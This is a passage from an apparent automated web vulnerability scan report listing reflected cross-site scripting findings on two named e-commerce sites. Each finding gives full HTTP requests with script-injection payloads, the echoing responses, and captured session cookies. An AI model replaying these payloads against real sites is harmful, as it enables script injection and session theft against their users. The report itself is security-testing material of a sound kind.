Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1
Content-Length: 994

noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=733&buyForm3021_options=97&buyForm3021_optionValue97=780&buyForm3021_options=99&buyForm3021_optionValue99=8523a9b7<img%20src%3da%20onerror%3dalert(1)>d450c3292d7&buyForm3021_options=102&buyForm3021_optionValue102=931&buyForm3021_options=104&buyForm3021_optionValue104=993&buyForm3021_options=101&buyForm3021_optionValue101=893&buyForm3021_options=98&buyForm3021
...[SNIP]...

Response

HTTP/1.1 500 Invalid data 8523a9b7<img src=a onerror=alert(1)>d450c3292d7 for CFSQLTYPE CF_SQL_INTEGER.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:09:28 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:09:28 GMT
Content-Length: 14075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 8523a9b7<img src=a onerror=alert(1)>d450c3292d7 for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.100. http://www.munichmyway.com/templates/common/products/productProperties.cfm [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 598c4<img%20src%3da%20onerror%3dalert(1)>01f6b76535b6cd0b was submitted in the id parameter. This input was echoed as 598c4<img src=a onerror=alert(1)>01f6b76535b6cd0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /templates/common/products/productProperties.cfm?noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=733&buyForm3021_options=97&buyForm3021_optionValue97=780&buyForm3021_options=99&buyForm3021_optionValue99=852&buyForm3021_options=102&buyForm3021_optionValue102=931&buyForm3021_options=104&buyForm3021_optionValue104=993&buyForm3021_options=101&buyForm3021_optionValue101=893&buyForm3021_options=98&buyForm3021_optionValue98=814&buyForm3021_options=89&buyForm3021_optionValue89=534&buyForm3021_options=92&buyForm3021_optionValue92=646&buyForm3021_options=91&buyForm3021_optionValue91=620&buyForm3021_options=103&buyForm3021_optionValue103=960&buyForm3021_options=93&buyForm3021_optionValue93=668&buyForm3021_options=96&buyForm3021_optionValue96=743&buyForm3021_options=94&buyForm3021_optionValue94=689&buyForm3021_options=100&buyForm3021_optionValue100=867&buyForm3021_options=90&buyForm3021_optionValue90=570&buyForm3021_options=234&buyForm3021_optionValue234=4901&id=3021598c4<img%20src%3da%20onerror%3dalert(1)>01f6b76535b6cd0b HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1

Response

HTTP/1.1 500 Element buyForm3021598c4<img src=a onerror=alert(1)>01f6b76535b6cd0b_productId is undefined in a Java object of type class coldfusion.filter.FormScope.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:24:33 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:24:32 GMT
Content-Length: 12421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Element buyForm3021598c4<img src=a onerror=alert(1)>01f6b76535b6cd0b_productId is undefined in a Java object of type class coldfusion.filter.FormScope.
</h1>
...[SNIP]...

3.101. http://www.oscommerce-manager.com/ [8b64d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed053e3a864d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /

Issue detail

The value of the 8b64d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed053e3a864d request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c271"><script>alert(1)</script>733e64ec1b7 was submitted in the 8b64d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed053e3a864d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?8b64d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed053e3a864d=14c271"><script>alert(1)</script>733e64ec1b7 HTTP/1.1
Host: www.oscommerce-manager.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:06:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Set-Cookie: SESSf6cba6c583dc3db17176d16b553730b0=2cea122d94bc5afbf815bd1b713f57b3; expires=Tue, 07-Jun-2011 17:40:11 GMT; path=/; domain=.oscommerce-manager.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:06:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 45642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/?8b64d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed053e3a864d=14c271"><script>alert(1)</script>733e64ec1b7')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.102. http://www.oscommerce-manager.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b64d"><script>alert(1)</script>d053e3a864d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?8b64d"><script>alert(1)</script>d053e3a864d=1 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:57:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Set-Cookie: SESSf6cba6c583dc3db17176d16b553730b0=9c2dfa33debdfc269ad620e56cc549c6; expires=Tue, 07-Jun-2011 17:30:28 GMT; path=/; domain=.oscommerce-manager.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:57:08 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 44952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/?8b64d"><script>alert(1)</script>d053e3a864d=1')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.103. http://www.oscommerce-manager.com/PAGE-70.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /PAGE-70.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19855"><script>alert(1)</script>f81842b4bda was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /PAGE-70.html19855"><script>alert(1)</script>f81842b4bda HTTP/1.1
Host: www.oscommerce-manager.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=c04ce3a5b54f17cd666936561a436137; has_js=1; __utma=31844193.1399225872.1305468130.1305468130.1305468130.1; __utmb=31844193.3.10.1305468130; __utmc=31844193; __utmz=31844193.1305468130.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 15:42:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 15:42:21 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/PAGE-70.html19855"><script>alert(1)</script>f81842b4bda')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.104. http://www.oscommerce-manager.com/misc/drupal.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /misc/drupal.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18ab2"><script>alert(1)</script>c8a9382be42 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /misc18ab2"><script>alert(1)</script>c8a9382be42/drupal.js?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:26 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/misc18ab2"><script>alert(1)</script>c8a9382be42/drupal.js?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.105. http://www.oscommerce-manager.com/misc/drupal.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /misc/drupal.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec796"><script>alert(1)</script>4cd7466cee6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /misc/drupal.jsec796"><script>alert(1)</script>4cd7466cee6?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:48 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/misc/drupal.jsec796"><script>alert(1)</script>4cd7466cee6?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.106. http://www.oscommerce-manager.com/misc/jquery.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /misc/jquery.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c1a2"><script>alert(1)</script>0adfa5fb7d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /misc7c1a2"><script>alert(1)</script>0adfa5fb7d8/jquery.js?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:44 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/misc7c1a2"><script>alert(1)</script>0adfa5fb7d8/jquery.js?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.107. http://www.oscommerce-manager.com/misc/jquery.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /misc/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload baba7"><script>alert(1)</script>59e7569ef6f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /misc/jquery.jsbaba7"><script>alert(1)</script>59e7569ef6f?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:01:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:01:05 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/misc/jquery.jsbaba7"><script>alert(1)</script>59e7569ef6f?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.108. http://www.oscommerce-manager.com/modules/aggregator/aggregator.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/aggregator/aggregator.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7b6a"><script>alert(1)</script>5e71549a0f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modulesa7b6a"><script>alert(1)</script>5e71549a0f6/aggregator/aggregator.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:59:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:59:23 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modulesa7b6a"><script>alert(1)</script>5e71549a0f6/aggregator/aggregator.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.109. http://www.oscommerce-manager.com/modules/aggregator/aggregator.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/aggregator/aggregator.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3277"><script>alert(1)</script>b21edc70c0e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/aggregatord3277"><script>alert(1)</script>b21edc70c0e/aggregator.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:59:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:59:43 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/aggregatord3277"><script>alert(1)</script>b21edc70c0e/aggregator.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.110. http://www.oscommerce-manager.com/modules/aggregator/aggregator.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/aggregator/aggregator.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ed16"><script>alert(1)</script>f7f860cf0a9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/aggregator/aggregator.css6ed16"><script>alert(1)</script>f7f860cf0a9?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/aggregator/aggregator.css6ed16"><script>alert(1)</script>f7f860cf0a9?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.111. http://www.oscommerce-manager.com/modules/aggregator/style/customer_testimonials.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/aggregator/style/customer_testimonials.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57413"><script>alert(1)</script>61f1851e1b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules57413"><script>alert(1)</script>61f1851e1b1/aggregator/style/customer_testimonials.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:59:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:59:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules57413"><script>alert(1)</script>61f1851e1b1/aggregator/style/customer_testimonials.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.112. http://www.oscommerce-manager.com/modules/aggregator/style/customer_testimonials.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/aggregator/style/customer_testimonials.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68db8"><script>alert(1)</script>45158dab790 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

